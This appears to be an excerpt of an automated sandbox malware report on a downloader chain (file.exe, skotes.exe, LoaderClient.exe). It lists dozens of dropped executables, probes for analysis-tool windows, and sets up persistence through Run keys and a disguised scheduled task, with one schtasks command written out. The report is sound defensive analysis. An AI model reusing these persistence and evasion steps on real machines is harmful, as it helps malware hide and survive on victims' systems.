                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\pywintypes310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015359001\f11f18202b.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32trace.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2s.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015364001\b2d27d0fa4.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\LoaderClient[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015363001\5102d46fb9.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_multiprocessing.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015362001\432b30086e.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32ui.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD5.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_cpuid_c.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\pyexpat.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015360001\3a4323f24d.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\pythoncom310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\python310.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Math\_modexp.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[3].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\libcrypto-1_1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015366001\dce9e93496.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_win32sysloader.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\libffi-7.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA224.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA1.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\psutil\_psutil_windows.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015361001\a4bd6a9bcb.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Util\_strxor.pydJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_keccak.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Protocol\_scrypt.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_portable.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_asyncio.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[2].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\win32api.cp310-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_des.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_pytransform.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA512.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\C1J7SVw[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\python3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\mfc140u.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_MD4.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015365001\82bc687fc3.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\sqlite3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA384.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_SHA256.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\_overlapped.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\libssl-1_1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Hash\_poly1305.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info\LICENSE.txt

                        Boot Survival

                        barindex
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
